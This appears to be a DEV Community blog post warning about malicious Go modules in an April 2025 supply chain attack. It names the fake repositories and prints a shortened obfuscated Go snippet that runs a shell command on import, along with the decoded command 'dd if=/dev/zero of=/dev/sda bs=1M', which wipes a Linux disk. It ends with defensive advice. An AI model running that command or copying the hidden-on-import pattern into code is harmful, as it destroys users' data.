The latest articles on DEV Community by alper (@alper1438). https://dev.to/alper1438 https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F2978939%2F49694866-0124-4823-bcbd-746a82b67ac7.png https://dev.to/alper1438 en alper Sun, 11 May 2025 16:53:54 +0000 https://dev.to/alper1438/dont-run-that-go-module-the-malware-that-wipes-your-linux-disk-2cgj https://dev.to/alper1438/dont-run-that-go-module-the-malware-that-wipes-your-linux-disk-2cgj <p>Recently, malicious software was discovered in Go packages hosted on GitHub. This malware has the ability to <strong>completely destroy your Linux system</strong>. Let's look at what happened and how we can protect ourselves.</p> <h2> What Happened? </h2> <p>In <strong>April 2025</strong>, a <strong>supply chain attack</strong> targeted the Go ecosystem. Attackers published fake but convincing modules with malicious code to GitHub:</p> <ul> <li><a href="https://github.com/truthfulpharm/prototransform" rel="noopener noreferrer"><code>github.com/truthfulpharm/prototransform</code></a></li> <li><a href="https://github.com/blankloggia/go-mcp" rel="noopener noreferrer"><code>github.com/blankloggia/go-mcp</code></a></li> <li><a href="https://github.com/steelpoor/tlsproxy" rel="noopener noreferrer"><code>github.com/steelpoor/tlsproxy</code></a></li> </ul> <p>The attackers carefully crafted these package names to appear trustworthy at a glance, significantly increasing the chance of accidental inclusion in real development projects.</p> <p>Once the malicious code is activated, it executes commands that systematically write zeroes across** every byte of the primary storage device**, making data recovery nearly impossible.</p> <p>To hide the malicious intent, the attackers used a technique called obfuscation, as seen in the code snippet below:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>func eGtROk() error { DmM := []string{"4", "/", " ", "e", "/", "g", "d", "3", "6", " ", "4", "w", "/", "7", "d", ".", "..."} pBRPhsxN := runtime.GOOS == "linux" bcbGOM := "/bin/sh" vpqIU := "-c" PWcf := DmM[11] + DmM[5] + DmM[47] + DmM[32] + ... if pBRPhsxN { exec.Command(bcbGOM, vpqIU, PWcf).Start() } return nil } var GEeEQNj = eGtROk() </code></pre> </div> <p>When imported and executed, this code runs a destructive Bash command:</p> <p><code>dd if=/dev/zero of=/dev/sda bs=1M</code></p> <h2> Why Is This So Dangerous? </h2> <ol> <li>This is not a vulnerability — it’s destructive malware.</li> <li>The malicious payload is hidden inside Go code with deceptively legitimate module names.</li> <li>It targets Linux systems only, checking the OS before executing.</li> </ol> <h2> How Can You Stay Safe as a Go Developer? </h2> <ol> <li> <strong>Always verify module sources:</strong> Use official sources or verified maintainers. Random GitHub modules with few stars or forks should raise red flags.</li> <li> <strong>Run govulncheck regularly:</strong> Go’s official vulnerability scanner helps detect known issues. </li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>go install golang.org/x/vuln/cmd/govulncheck@latest govulncheck ./... </code></pre> </div> <ol> <li> <strong>Scan your dependencies with external tools:</strong> Tools like OSV-Scanner or Dependabot can help detect dangerous packages early.</li> </ol> <h2> Have Thoughts or Questions? </h2> <p>If you have suggestions or questions, feel free to drop a comment.<br> Thanks for reading — stay safe! </p> <h2> References </h2> <p><a href="https://cybersecuritynews.com/hackers-weaponizing-go-modules/?utm_source=chatgpt.com" rel="noopener noreferrer">cybersecuritynews.com/hackers-weaponizing-go-modules</a><br> <a href="https://go.dev/doc/tutorial/govulncheck" rel="noopener noreferrer">go.dev/doc/tutorial/govulncheck</a></p> security webdev go programming